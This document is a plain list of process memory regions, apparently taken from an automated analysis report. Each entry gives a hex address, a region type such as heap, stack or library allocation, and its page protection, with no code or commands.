3ECC000
heap
page read and write
244B000
stack
page read and write
4842000
trusted library allocation
page read and write
719E000
stack
page read and write
770B000
heap
page read and write
3636000
trusted library allocation
page read and write
5DBC000
trusted library allocation
page read and write
6C352000
unkown
page read and write
5FB0000
heap
page read and write
3D81000
trusted library allocation
page read and write
3F68000
heap
page read and write
3D6E000
trusted library allocation
page read and write
3F44000
heap
page read and write
977000
trusted library allocation
page execute and read and write
3350000
trusted library allocation
page read and write
2450000
trusted library allocation
page execute and read and write
6A1E000
stack
page read and write
52B0000
trusted library allocation
page read and write
38A1000
heap
page read and write
25B0000
trusted library allocation
page read and write
67D0000
heap
page read and write
2F42000
trusted library allocation
page read and write
53D0000
trusted library allocation
page read and write
277E000
trusted library allocation
page read and write
3B2000
unkown
page readonly
2EC5000
trusted library allocation
page read and write
A3F1000
trusted library allocation
page read and write
3B5D000
heap
page read and write
86E1000
heap
page read and write
2F26000
trusted library allocation
page read and write
820000
heap
page read and write
4EA7000
trusted library allocation
page read and write
8B70000
heap
page read and write
5C0D000
heap
page read and write
103D000
trusted library allocation
page execute and read and write
4D13000
heap
page read and write
2F31000
trusted library allocation
page read and write
7740000
heap
page execute and read and write
2E69000
trusted library allocation
page read and write
30B1000
trusted library allocation
page read and write
8100000
heap
page read and write
782E000
stack
page read and write
B5A000
stack
page read and write
748F000
stack
page read and write
28B5000
trusted library allocation
page read and write
4B0E000
heap
page read and write
309F000
trusted library allocation
page read and write
46F8000
trusted library allocation
page read and write
762D000
stack
page read and write
A60000
heap
page read and write
590000
heap
page read and write
48FE000
heap
page read and write
3041000
trusted library allocation
page read and write
28AD000
trusted library allocation
page read and write
40F0000
trusted library allocation
page read and write
2B40000
trusted library allocation
page read and write
2FA9000
trusted library allocation
page read and write
304F000
trusted library allocation
page read and write
A147000
trusted library allocation
page read and write
7DF0000
heap
page read and write
D50000
trusted library allocation
page read and write
4712000
trusted library allocation
page read and write
2831000
trusted library allocation
page read and write
25E0000
heap
page execute and read and write
5292000
trusted library allocation
page read and write
2E8C000
heap
page read and write
30D5000
trusted library allocation
page read and write
2815000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
5EE000
stack
page read and write
FAA000
heap
page read and write
8B90000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
9F58000
trusted library allocation
page read and write
7EBE000
stack
page read and write
2789000
trusted library allocation
page read and write
621D000
heap
page read and write
2E1E000
stack
page read and write
5353000
trusted library allocation
page read and write
8348000
heap
page read and write
47E4000
trusted library allocation
page read and write
3B67000
heap
page read and write
2FD9000
trusted library allocation
page read and write
744E000
stack
page read and write
9F05000
trusted library allocation
page read and write
77E9000
heap
page read and write
6F7000
stack
page read and write
4DA3000
heap
page read and write
2964000
trusted library allocation
page read and write
2FCD000
trusted library allocation
page read and write
2F99000
trusted library allocation
page read and write
48AC000
trusted library allocation
page read and write
27AD000
trusted library allocation
page read and write
4D0E000
stack
page read and write
2FBD000
trusted library allocation
page read and write
379000
stack
page read and write
2480000
trusted library allocation
page read and write
2F83000
trusted library allocation
page read and write
F64000
heap
page read and write
2DDE000
stack
page read and write
74E3000
heap
page read and write
784C000
stack
page read and write
86D8000
heap
page read and write
308D000
trusted library allocation
page read and write
3AA5000
heap
page read and write
526E000
stack
page read and write
5070000
trusted library allocation
page execute and read and write
FC8000
heap
page read and write
3001000
trusted library allocation
page read and write
2FDB000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
A0FC000
trusted library allocation
page read and write
2C6C000
trusted library allocation
page read and write
52EE000
trusted library allocation
page read and write
4BD0000
trusted library allocation
page read and write
2EE7000
trusted library allocation
page read and write
6570000
trusted library allocation
page execute and read and write
2F91000
trusted library allocation
page read and write
304B000
trusted library allocation
page read and write
5312000
trusted library allocation
page read and write
2E50000
trusted library section
page read and write
4CB0000
trusted library allocation
page read and write
9670000
trusted library allocation
page execute and read and write
586F000
stack
page read and write
F9C000
heap
page read and write
3F68000
heap
page read and write
2F4E000
trusted library allocation
page read and write
2E9B000
trusted library allocation
page read and write
2787000
trusted library allocation
page read and write
4F7F000
trusted library allocation
page read and write
98E000
stack
page read and write
2F8B000
trusted library allocation
page read and write
49C4000
heap
page read and write
B6C7000
trusted library allocation
page read and write
465D000
trusted library allocation
page read and write
3F68000
heap
page read and write
465B000
trusted library allocation
page read and write
A334000
trusted library allocation
page read and write
2659000
trusted library allocation
page read and write
2FD9000
trusted library allocation
page read and write
2B20000
heap
page read and write
4011000
trusted library allocation
page read and write
4BA000
stack
page read and write
FB4000
heap
page read and write
3B78000
heap
page read and write
3F7C000
heap
page read and write
26D5000
trusted library allocation
page read and write
38D9000
heap
page read and write
3B81000
heap
page read and write
F40000
heap
page read and write
38E1000
heap
page read and write
2FB5000
trusted library allocation
page read and write
96A000
trusted library allocation
page execute and read and write
52CE000
stack
page read and write
2F3F000
trusted library allocation
page read and write
2E9E000
trusted library allocation
page read and write
87B3000
heap
page read and write
3089000
heap
page read and write
7413000
heap
page read and write
4B50000
heap
page read and write
35E7000
trusted library allocation
page read and write
6CAD000
stack
page read and write
2EC9000
trusted library allocation
page read and write
46C3000
trusted library allocation
page read and write
4830000
heap
page read and write
71DB000
heap
page read and write
A2EC000
trusted library allocation
page read and write
2739000
trusted library allocation
page read and write
309D000
trusted library allocation
page read and write
2DF9000
trusted library allocation
page read and write
2FB2000
trusted library allocation
page read and write
33B0000
heap
page execute and read and write
8280000
trusted library allocation
page read and write
5450000
heap
page read and write
7815000
heap
page read and write
2EA0000
trusted library allocation
page execute and read and write
71C3000
heap
page read and write
124F000
stack
page read and write
6C081000
unkown
page read and write
2560000
trusted library allocation
page read and write
2813000
trusted library allocation
page read and write
82E3000
trusted library allocation
page read and write
2FED000
trusted library allocation
page read and write
588D000
stack
page read and write
276B000
trusted library allocation
page read and write
4189000
trusted library allocation
page read and write
872C000
stack
page read and write
764E000
stack
page read and write
6C07A000
unkown
page readonly
760C000
stack
page read and write
2E20000
heap
page read and write
2809000
trusted library allocation
page read and write
30CD000
trusted library allocation
page read and write
5356000
trusted library allocation
page read and write
8BA3000
trusted library allocation
page read and write
4A20000
trusted library allocation
page read and write
722E000
stack
page read and write
4CBF000
stack
page read and write
83F8000
heap
page read and write
2FD5000
trusted library allocation
page read and write
4F2F000
heap
page read and write
3FE2000
heap
page read and write
40AF000
heap
page read and write
5453000
heap
page read and write
B2B000
stack
page read and write
FB4000
heap
page read and write
30E8000
trusted library allocation
page read and write
60A000
heap
page read and write
404F000
heap
page read and write
3B91000
trusted library allocation
page read and write
2B76000
heap
page read and write
2F91000
trusted library allocation
page read and write
59F0000
trusted library allocation
page read and write
4B5D000
heap
page read and write
2C6F000
trusted library allocation
page read and write
10B0000
heap
page read and write
2FC7000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
130D000
trusted library allocation
page execute and read and write
2540000
trusted library allocation
page read and write
448D000
heap
page read and write
2FCB000
trusted library allocation
page read and write
FA4000
heap
page read and write
74E0000
trusted library allocation
page read and write
26B6000
trusted library allocation
page read and write
4F5C000
stack
page read and write
5D51000
trusted library allocation
page read and write
2FC1000
trusted library allocation
page read and write
740000
heap
page read and write
2580000
heap
page execute and read and write
724E000
stack
page read and write
28A1000
trusted library allocation
page read and write
5869000
trusted library allocation
page read and write
2715000
trusted library allocation
page read and write
48A1000
trusted library allocation
page read and write
3D82000
heap
page read and write
55A0000
heap
page execute and read and write
293E000
trusted library allocation
page read and write
25FB000
trusted library allocation
page read and write
F9D000
heap
page read and write
27AF000
trusted library allocation
page read and write
3EC5000
heap
page read and write
3FC7000
heap
page read and write
2FCD000
trusted library allocation
page read and write
8372000
heap
page read and write
57E0000
heap
page read and write
56E0000
trusted library allocation
page read and write
8785000
heap
page read and write
2FD5000
trusted library allocation
page read and write
2DE0000
heap
page read and write
6106000
heap
page read and write
A51000
heap
page read and write
2750000
heap
page read and write
60FD000
stack
page read and write
47E0000
trusted library allocation
page read and write
5A00000
trusted library allocation
page execute and read and write
77E6000
heap
page read and write
10AE000
stack
page read and write
2FBD000
trusted library allocation
page read and write
26D2000
trusted library allocation
page read and write
6226000
heap
page read and write
F95000
heap
page read and write
2E9B000
stack
page read and write
F99000
heap
page read and write
F37000
stack
page read and write
28DC000
heap
page read and write
533E000
trusted library allocation
page read and write
5050000
trusted library allocation
page read and write
2837000
heap
page read and write
8B46000
heap
page read and write
3DC6000
trusted library allocation
page read and write
A2AF000
trusted library allocation
page read and write
2F5F000
trusted library allocation
page read and write
67EE000
stack
page read and write
3023000
trusted library allocation
page read and write
2F3F000
trusted library allocation
page read and write
4043000
heap
page read and write
2E01000
trusted library allocation
page read and write
5324000
trusted library allocation
page read and write
307B000
trusted library allocation
page read and write
273B000
trusted library allocation
page read and write
6C10D000
unkown
page read and write
307F000
unkown
page read and write
7960000
heap
page read and write
2A9E000
unkown
page read and write
128A000
trusted library allocation
page execute and read and write
2F56000
trusted library allocation
page read and write
87FD000
stack
page read and write
24CE000
stack
page read and write
3007000
trusted library allocation
page read and write
8D4E000
stack
page read and write
300B000
trusted library allocation
page read and write
2701000
trusted library allocation
page read and write
403E000
trusted library allocation
page read and write
A13C000
trusted library allocation
page read and write
3081000
trusted library allocation
page read and write
79D7000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
38E7000
heap
page read and write
88FE000
stack
page read and write
9F62000
trusted library allocation
page read and write
3F91000
heap
page read and write
2755000
trusted library allocation
page read and write
3BD1000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
26F9000
trusted library allocation
page read and write
6120000
heap
page read and write
5362000
trusted library allocation
page read and write
F9D000
heap
page read and write
2792000
trusted library allocation
page read and write
7FAC0000
trusted library allocation
page execute and read and write
9D6000
trusted library allocation
page execute and read and write
2C64000
trusted library allocation
page read and write
3097000
trusted library allocation
page read and write
8B81000
heap
page read and write
8B0E000
heap
page read and write
3081000
trusted library allocation
page read and write
2FD1000
trusted library allocation
page read and write
A5BC000
trusted library allocation
page read and write
6EEE000
stack
page read and write
4EAA000
heap
page read and write
48F6000
trusted library allocation
page read and write
53C0000
trusted library allocation
page read and write
FAC000
heap
page read and write
6E3B000
stack
page read and write
953000
trusted library allocation
page read and write
4F70000
heap
page read and write
2FA2000
trusted library allocation
page read and write
2FAB000
trusted library allocation
page read and write
43FC000
heap
page read and write
52D0000
trusted library allocation
page read and write
6221000
heap
page read and write
7274000
trusted library allocation
page read and write
943000
trusted library allocation
page execute and read and write
A547000
trusted library allocation
page read and write
130E000
stack
page read and write
9F92000
trusted library allocation
page read and write
5612000
trusted library allocation
page read and write
33EA000
heap
page read and write
3031000
trusted library allocation
page read and write
2F1F000
trusted library allocation
page read and write
833C000
heap
page read and write
4DA9000
trusted library allocation
page read and write
8BD0000
trusted library allocation
page execute and read and write
A384000
trusted library allocation
page read and write
FA4000
heap
page read and write
8789000
heap
page read and write
4219000
trusted library allocation
page read and write
3F68000
heap
page read and write
4710000
heap
page read and write
5DF6000
heap
page read and write
4042000
trusted library allocation
page read and write
4FBC000
stack
page read and write
4170000
trusted library allocation
page read and write
151E000
stack
page read and write
26E5000
trusted library allocation
page read and write
A51C000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
B60000
trusted library allocation
page read and write
2C12000
trusted library allocation
page read and write
4EFF000
stack
page read and write
2740000
trusted library allocation
page execute and read and write
2743000
trusted library allocation
page read and write
2F8A000
trusted library allocation
page read and write
8CE000
stack
page read and write
73D000
stack
page read and write
74CE000
stack
page read and write
A38B000
trusted library allocation
page read and write
75CF000
stack
page read and write
1317000
heap
page read and write
FA1000
heap
page read and write
121E000
stack
page read and write
2E78000
heap
page read and write
980000
heap
page read and write
1280000
trusted library allocation
page read and write
7F0A0000
trusted library allocation
page execute and read and write
4CA0000
heap
page execute and read and write
B9E000
trusted library allocation
page read and write
27FF000
trusted library allocation
page read and write
F99000
heap
page read and write
F90000
heap
page read and write
46AD000
heap
page read and write
4651000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
3075000
trusted library allocation
page read and write
87B0000
trusted library allocation
page execute and read and write
3011000
trusted library allocation
page read and write
2F08000
heap
page read and write
7A1C000
stack
page read and write
1320000
heap
page read and write
2781000
trusted library allocation
page read and write
3B67000
heap
page read and write
7212000
heap
page read and write
3B67000
heap
page read and write
8B42000
heap
page read and write
2717000
trusted library allocation
page read and write
3FEF000
heap
page read and write
7A9E000
stack
page read and write
2DFE000
stack
page read and write
51CE000
trusted library allocation
page read and write
3057000
trusted library allocation
page read and write
30A7000
trusted library allocation
page read and write
2CF0000
heap
page read and write
28C3000
heap
page read and write
27FD000
trusted library allocation
page read and write
10B3000
trusted library allocation
page read and write
100F000
heap
page read and write
A4FC000
trusted library allocation
page read and write
28AF000
trusted library allocation
page read and write
3F2C000
heap
page read and write
303E000
stack
page read and write
3960000
trusted library allocation
page read and write
297F000
trusted library allocation
page read and write
72A5000
trusted library allocation
page read and write
3380000
trusted library allocation
page read and write
27D9000
trusted library allocation
page read and write
2FB3000
trusted library allocation
page read and write
79CE000
stack
page read and write
2B65000
heap
page read and write
A2A8000
trusted library allocation
page read and write
811E000
stack
page read and write
25D0000
trusted library allocation
page read and write
585B000
heap
page read and write
A45C000
trusted library allocation
page read and write
3F53000
trusted library allocation
page read and write
32D0000
heap
page read and write
900000
heap
page read and write
4A48000
heap
page read and write
FDD000
trusted library allocation
page execute and read and write
2F00000
heap
page read and write
5590000
trusted library allocation
page read and write
2FFF000
trusted library allocation
page read and write
795C000
heap
page read and write
305B000
trusted library allocation
page read and write
29EE000
stack
page read and write
6C671000
unkown
page execute read
8B5000
heap
page read and write
5700000
trusted library allocation
page read and write
3330000
trusted library allocation
page read and write
4749000
trusted library allocation
page read and write
3089000
trusted library allocation
page read and write
27F9000
trusted library allocation
page read and write
6289000
heap
page read and write
4AEE000
trusted library allocation
page read and write
F8C000
heap
page read and write
3362000
trusted library allocation
page read and write
2C58000
heap
page read and write
3FF0000
heap
page read and write
38BD000
heap
page read and write
3073000
trusted library allocation
page read and write
4DB3000
trusted library allocation
page read and write
7828000
heap
page read and write
2F8D000
trusted library allocation
page read and write
1264000
trusted library allocation
page read and write
1260000
trusted library allocation
page read and write
26EB000
trusted library allocation
page read and write
F20000
heap
page read and write
11F0000
trusted library allocation
page execute and read and write
7A6E000
stack
page read and write
2F93000
trusted library allocation
page read and write
276B000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
270D000
trusted library allocation
page read and write
AEE000
stack
page read and write
3EC9000
trusted library allocation
page read and write
2E8D000
trusted library allocation
page read and write
6D1000
heap
page read and write
30BE000
stack
page read and write
7930000
heap
page read and write
3EE8000
trusted library allocation
page read and write
2950000
trusted library allocation
page read and write
273D000
trusted library allocation
page read and write
3FD5000
heap
page read and write
2F4D000
trusted library allocation
page read and write
2D90000
heap
page read and write
2713000
trusted library allocation
page read and write
A399000
trusted library allocation
page read and write
407A000
trusted library allocation
page read and write
4812000
trusted library allocation
page read and write
65AE000
stack
page read and write
4B92000
heap
page read and write
3095000
trusted library allocation
page read and write
530D000
trusted library allocation
page read and write
741D000
stack
page read and write
5A30000
trusted library section
page read and write
2EC0000
trusted library allocation
page read and write
11F4000
heap
page read and write
101A000
heap
page read and write
B8B000
trusted library allocation
page read and write
4D5F000
heap
page read and write
280B000
trusted library allocation
page read and write
27B9000
trusted library allocation
page read and write
27D3000
trusted library allocation
page read and write
3683000
trusted library allocation
page read and write
2F97000
trusted library allocation
page read and write
F92000
heap
page read and write
7B1E000
stack
page read and write
2E64000
heap
page read and write
6FCE000
stack
page read and write
27D5000
trusted library allocation
page read and write
46F4000
heap
page read and write
7A9C000
stack
page read and write
2FD7000
trusted library allocation
page read and write
33C0000
heap
page read and write
2F5B000
trusted library allocation
page read and write
1442000
trusted library allocation
page read and write
56F0000
heap
page read and write
811D000
trusted library allocation
page read and write
5C2F000
stack
page read and write
3EA0000
trusted library allocation
page read and write
2F4B000
trusted library allocation
page read and write
301F000
trusted library allocation
page read and write
BC0000
trusted library allocation
page read and write
66BC000
stack
page read and write
3063000
trusted library allocation
page read and write
4FB2000
heap
page read and write
2FE5000
trusted library allocation
page read and write
54CC000
stack
page read and write
4C58000
heap
page read and write
9F13000
trusted library allocation
page read and write
30C3000
trusted library allocation
page read and write
3F00000
trusted library allocation
page read and write
DEC000
heap
page read and write
325E000
stack
page read and write
3D0000
heap
page read and write
2F29000
trusted library allocation
page read and write
4D10000
heap
page read and write
3AA0000
heap
page read and write
59F7000
trusted library allocation
page read and write
106B000
trusted library allocation
page execute and read and write
4DA2000
heap
page read and write
2ED0000
heap
page execute and read and write
48E000
unkown
page write copy
1170000
trusted library allocation
page read and write
6C6CB000
unkown
page readonly
745F000
heap
page read and write
27F1000
trusted library allocation
page read and write
4382000
heap
page read and write
9EEC000
trusted library allocation
page read and write
4057000
trusted library allocation
page read and write
794C000
heap
page read and write
3F76000
heap
page read and write
FAA000
heap
page read and write
A313000
trusted library allocation
page read and write
28C9000
trusted library allocation
page read and write
2DE7000
trusted library allocation
page read and write
3E49000
heap
page read and write
3075000
trusted library allocation
page read and write
2474000
trusted library allocation
page read and write
538F000
trusted library allocation
page read and write
5340000
heap
page read and write
30AD000
trusted library allocation
page read and write
2FDB000
trusted library allocation
page read and write
F40000
heap
page read and write
82D0000
trusted library allocation
page read and write
2C28000
heap
page read and write
A11C000
trusted library allocation
page read and write
9FB000
trusted library allocation
page execute and read and write
306D000
trusted library allocation
page read and write
3011000
trusted library allocation
page read and write
5480000
heap
page execute and read and write
30C8000
trusted library allocation
page read and write
2FB4000
trusted library allocation
page read and write
30E5000
trusted library allocation
page read and write
2F6B000
trusted library allocation
page read and write
6209000
heap
page read and write
26EF000
trusted library allocation
page read and write
3021000
trusted library allocation
page read and write
5FAE000
stack
page read and write
6FF0000
heap
page read and write
5395000
trusted library allocation
page read and write
2EC9000
trusted library allocation
page read and write
47F8000
trusted library allocation
page read and write
2F89000
trusted library allocation
page read and write
1119000
heap
page read and write
84BE000
stack
page read and write
57D0000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
FA4000
heap
page read and write
FE2000
trusted library allocation
page read and write
327F000
stack
page read and write
2BDD000
trusted library allocation
page read and write
4917000
trusted library allocation
page read and write
75DE000
stack
page read and write
640000
heap
page read and write
13C5000
heap
page read and write
3FD4000
heap
page read and write
30D3000
trusted library allocation
page read and write
2F63000
trusted library allocation
page read and write
305F000
trusted library allocation
page read and write
3DEF000
trusted library allocation
page read and write
9B3000
trusted library allocation
page execute and read and write
7443000
heap
page read and write
F50000
heap
page read and write
71F3000
heap
page read and write
30E3000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
3F76000
heap
page read and write
3DCF000
trusted library allocation
page read and write
4091000
trusted library allocation
page read and write
117D000
trusted library allocation
page execute and read and write
2D0C000
stack
page read and write
BE9000
heap
page read and write
30A5000
trusted library allocation
page read and write
3333000
trusted library allocation
page execute and read and write
9CD000
trusted library allocation
page execute and read and write
2760000
trusted library allocation
page read and write
462E000
heap
page read and write
2E07000
trusted library allocation
page read and write
4D60000
heap
page read and write
2FD1000
trusted library allocation
page read and write
6199000
heap
page read and write
50D0000
trusted library section
page read and write
976000
heap
page read and write
35D000
stack
page read and write
2791000
trusted library allocation
page read and write
600000
heap
page read and write
7950000
heap
page read and write
770E000
stack
page read and write
2D81000
trusted library allocation
page read and write
AF6000
stack
page read and write
38E1000
heap
page read and write
5345000
trusted library allocation
page read and write
833F000
stack
page read and write
416F000
trusted library allocation
page read and write
FD7000
heap
page read and write
FF3000
heap
page read and write
7C8F000
stack
page read and write
3AAB000
heap
page read and write
3F76000
heap
page read and write
710E000
stack
page read and write
2FB6000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
508B000
stack
page read and write
9BBE000
stack
page read and write
F00000
unclassified section
page read and write
1303000
trusted library allocation
page execute and read and write
FA7000
heap
page read and write
5EF7000
heap
page read and write
2FC7000
trusted library allocation
page read and write
5D2F000
heap
page read and write
729A000
stack
page read and write
2B00000
heap
page read and write
3001000
trusted library allocation
page read and write
F55000
heap
page read and write
2FDF000
trusted library allocation
page read and write
4089000
trusted library allocation
page read and write
2FEB000
trusted library allocation
page read and write
E14000
heap
page read and write
1304000
trusted library allocation
page read and write
3FA5000
heap
page read and write
71FA000
heap
page read and write
2FA1000
trusted library allocation
page read and write
2FB1000
trusted library allocation
page read and write
2FB1000
trusted library allocation
page read and write
26FB000
trusted library allocation
page read and write
7456000
heap
page read and write
BC0000
heap
page read and write
4751000
trusted library allocation
page read and write
4903000
heap
page read and write
3942000
heap
page read and write
475D000
trusted library allocation
page read and write
47B5000
trusted library allocation
page read and write
278B000
trusted library allocation
page read and write
61EA000
heap
page read and write
46C8000
trusted library allocation
page read and write
296E000
stack
page read and write
33E7000
heap
page read and write
7B20000
trusted library allocation
page read and write
749B000
stack
page read and write
6EAD000
stack
page read and write
6275000
heap
page read and write
8A9E000
stack
page read and write
791C000
stack
page read and write
9F1000
heap
page read and write
CB0000
heap
page read and write
101D000
heap
page read and write
FFB000
heap
page read and write
3180000
heap
page read and write
6A90000
trusted library allocation
page read and write
3B85000
heap
page read and write
302C000
heap
page read and write
2750000
trusted library allocation
page read and write
2FBF000
stack
page read and write
568D000
stack
page read and write
4650000
trusted library allocation
page read and write
50EA000
heap
page read and write
2745000
trusted library allocation
page read and write
30C1000
trusted library allocation
page read and write
3085000
trusted library allocation
page read and write
5520000
trusted library allocation
page read and write
2709000
trusted library allocation
page read and write
2F4D000
stack
page read and write
3AAD000
heap
page read and write
FD3000
trusted library allocation
page read and write
9E0000
heap
page read and write
32D7000
heap
page read and write
A487000
trusted library allocation
page read and write
2793000
trusted library allocation
page read and write
4F70000
trusted library section
page read and write
2FCB000
trusted library allocation
page read and write
7BC0000
trusted library allocation
page read and write
28EC000
heap
page read and write
7700000
trusted library allocation
page read and write
738F000
stack
page read and write
2591000
trusted library allocation
page read and write
408C000
trusted library allocation
page read and write
2767000
trusted library allocation
page read and write
52B5000
trusted library allocation
page read and write
3065000
trusted library allocation
page read and write
2AB0000
trusted library allocation
page read and write
774B000
stack
page read and write
3029000
trusted library allocation
page read and write
3079000
trusted library allocation
page read and write
2EA2000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
30CD000
trusted library allocation
page read and write
2900000
trusted library allocation
page execute and read and write
9FA6000
trusted library allocation
page read and write
558E000
stack
page read and write
301B000
trusted library allocation
page read and write
2FF5000
trusted library allocation
page read and write
3007000
trusted library allocation
page read and write
5DC7000
heap
page read and write
59E8000
trusted library allocation
page read and write
2E27000
trusted library allocation
page read and write
2980000
trusted library allocation
page read and write
3B53000
heap
page read and write
59EE000
trusted library allocation
page read and write
3083000
trusted library allocation
page read and write
275F000
trusted library allocation
page read and write
10C0000
trusted library allocation
page read and write
2B30000
trusted library allocation
page read and write
48CC000
trusted library allocation
page read and write
7282000
heap
page read and write
2F9F000
trusted library allocation
page read and write
56B0000
heap
page read and write
2E71000
trusted library allocation
page read and write
11A2000
trusted library allocation
page read and write
48F000
unkown
page write copy
2719000
trusted library allocation
page read and write
4221000
trusted library allocation
page read and write
6C475000
unkown
page readonly
10C6000
heap
page read and write
4D1E000
heap
page read and write
4B50000
trusted library allocation
page execute and read and write
2E20000
heap
page read and write
69B000
heap
page read and write
4231000
trusted library allocation
page read and write
3340000
trusted library allocation
page read and write
27DB000
trusted library allocation
page read and write
6C481000
unkown
page execute read
27A1000
trusted library allocation
page read and write
2BF1000
trusted library allocation
page read and write
4DB1000
trusted library allocation
page read and write
2E19000
trusted library allocation
page read and write
4657000
trusted library allocation
page read and write
5080000
trusted library allocation
page execute and read and write
6298000
heap
page read and write
2F7E000
trusted library allocation
page read and write
A031000
trusted library allocation
page read and write
57AE000
stack
page read and write
1310000
heap
page execute and read and write
302D000
trusted library allocation
page read and write
2FE3000
trusted library allocation
page read and write
2E87000
trusted library allocation
page read and write
7C5E000
stack
page read and write
9B4000
trusted library allocation
page read and write
3F61000
heap
page read and write
7ADE000
stack
page read and write
86EE000
stack
page read and write
56E9000
trusted library allocation
page read and write
1173000
trusted library allocation
page execute and read and write
3F6F000
heap
page read and write
5507000
trusted library allocation
page read and write
5F0000
heap
page read and write
9D7000
heap
page read and write
FC3000
trusted library allocation
page execute and read and write
769E000
stack
page read and write
4730000
trusted library allocation
page read and write
48EC000
trusted library allocation
page read and write
302D000
trusted library allocation
page read and write
D95000
heap
page read and write
2FD9000
trusted library allocation
page read and write
6C624000
unkown
page readonly
1097000
heap
page read and write
274F000
trusted library allocation
page read and write
2FD7000
trusted library allocation
page read and write
300F000
trusted library allocation
page read and write
2FAD000
trusted library allocation
page read and write
2FA8000
trusted library allocation
page read and write
F92000
heap
page read and write
301D000
trusted library allocation
page read and write
4777000
heap
page read and write
6F0E000
stack
page read and write
2771000
trusted library allocation
page read and write
5710000
trusted library allocation
page execute and read and write
8770000
heap
page read and write
7C9E000
stack
page read and write
36E3000
trusted library allocation
page read and write
52C0000
trusted library allocation
page execute and read and write
FA1000
heap
page read and write
2CFD000
stack
page read and write
3F91000
heap
page read and write
52E0000
trusted library allocation
page read and write
6076000
heap
page read and write
6CFE000
stack
page read and write
7FC00000
trusted library allocation
page execute and read and write
BEA000
stack
page read and write
300F000
trusted library allocation
page read and write
1000000
heap
page read and write
5180000
heap
page read and write
333D000
trusted library allocation
page execute and read and write
2D14000
heap
page read and write
2F65000
trusted library allocation
page read and write
6C3E0000
unkown
page write copy
3E3F000
trusted library allocation
page read and write
2730000
heap
page read and write
112E000
stack
page read and write
4BD5000
heap
page read and write
E8E000
stack
page read and write
27C0000
heap
page execute and read and write
6169000
heap
page read and write
8B32000
heap
page read and write
9F84000
trusted library allocation
page read and write
76D5000
heap
page read and write
4700000
trusted library allocation
page read and write
340E000
stack
page read and write
40A7000
trusted library allocation
page read and write
5376000
trusted library allocation
page read and write
F8E000
stack
page read and write
305D000
trusted library allocation
page read and write
263A000
trusted library allocation
page read and write
3360000
trusted library allocation
page read and write
3B7D000
heap
page read and write
32DF000
stack
page read and write
2FD3000
trusted library allocation
page read and write
44A1000
heap
page read and write
A8E000
stack
page read and write
5351000
trusted library allocation
page read and write
26E1000
trusted library allocation
page read and write
75E000
stack
page read and write
FB5000
heap
page read and write
7650000
trusted library allocation
page read and write
A1000
unkown
page execute read
2D00000
heap
page read and write
74A0000
heap
page read and write
A03C000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
2EAA000
trusted library allocation
page read and write
5434000
trusted library allocation
page read and write
4AF6000
trusted library allocation
page read and write
3F06000
heap
page read and write
4F2E000
heap
page read and write
FA4000
heap
page read and write
2830000
heap
page read and write
2F3D000
trusted library allocation
page read and write
2F95000
trusted library allocation
page read and write
2DFE000
stack
page read and write
5849000
trusted library allocation
page read and write
2F0D000
stack
page read and write
4728000
trusted library allocation
page read and write
3390000
heap
page readonly
883B000
stack
page read and write
4796000
trusted library allocation
page read and write
57CD000
stack
page read and write
2FF9000
trusted library allocation
page read and write
2E80000
trusted library allocation
page read and write
3024000
trusted library allocation
page read and write
A087000
trusted library allocation
page read and write
7EDC000
stack
page read and write
7CAE000
stack
page read and write
27EF000
trusted library allocation
page read and write
47F0000
heap
page execute and read and write
43FD000
heap
page read and write
760000
heap
page read and write
74D0000
trusted library allocation
page read and write
3FB2000
heap
page read and write
2765000
trusted library allocation
page read and write
E85000
heap
page read and write
D20000
trusted library allocation
page read and write
309B000
trusted library allocation
page read and write
12A0000
trusted library allocation
page read and write
622A000
heap
page read and write
2677000
trusted library allocation
page read and write
2725000
trusted library allocation
page read and write
4A7E000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
2BE0000
heap
page read and write
2F95000
trusted library allocation
page read and write
4211000
trusted library allocation
page read and write
2F6B000
trusted library allocation
page read and write
3AAC000
heap
page read and write
2795000
trusted library allocation
page read and write
A3A6000
trusted library allocation
page read and write
1190000
trusted library allocation
page read and write
2773000
trusted library allocation
page read and write
4206000
heap
page read and write
2FF3000
trusted library allocation
page read and write
2B76000
heap
page read and write
76E5000
heap
page read and write
2EFB000
trusted library allocation
page read and write
5614000
trusted library allocation
page read and write
2723000
trusted library allocation
page read and write
3003000
trusted library allocation
page read and write
1290000
heap
page read and write
9F48000
trusted library allocation
page read and write
29AE000
stack
page read and write
B50000
heap
page read and write
306F000
trusted library allocation
page read and write
4696000
trusted library allocation
page read and write
100B000
trusted library allocation
page execute and read and write
3B0000
unkown
page readonly
2590000
trusted library section
page read and write
2E73000
trusted library allocation
page execute and read and write
D9B000
heap
page read and write
A2F4000
trusted library allocation
page read and write
63E000
heap
page read and write
83A2000
heap
page read and write
3F06000
trusted library allocation
page read and write
2F82000
trusted library allocation
page read and write
4828000
trusted library allocation
page read and write
576E000
stack
page read and write
A2AD000
trusted library allocation
page read and write
40DE000
trusted library allocation
page read and write
9939000
heap
page read and write
3CAD000
heap
page read and write
2BD4000
trusted library allocation
page read and write
478F000
trusted library allocation
page read and write
FA4000
heap
page read and write
BA6000
trusted library allocation
page read and write
300E000
stack
page read and write
2F4A000
trusted library allocation
page read and write
4B80000
heap
page read and write
38E1000
heap
page read and write
5320000
trusted library allocation
page read and write
27CF000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
6FC000
stack
page read and write
26FD000
trusted library allocation
page read and write
6C670000
unkown
page readonly
2FB9000
trusted library allocation
page read and write
302F000
trusted library allocation
page read and write
53C0000
trusted library allocation
page execute and read and write
4355000
heap
page read and write
1440000
trusted library allocation
page read and write
475F000
trusted library allocation
page read and write
2B95000
heap
page read and write
4F5E000
trusted library allocation
page read and write
3050000
heap
page read and write
2E23000
trusted library allocation
page read and write
2FDD000
trusted library allocation
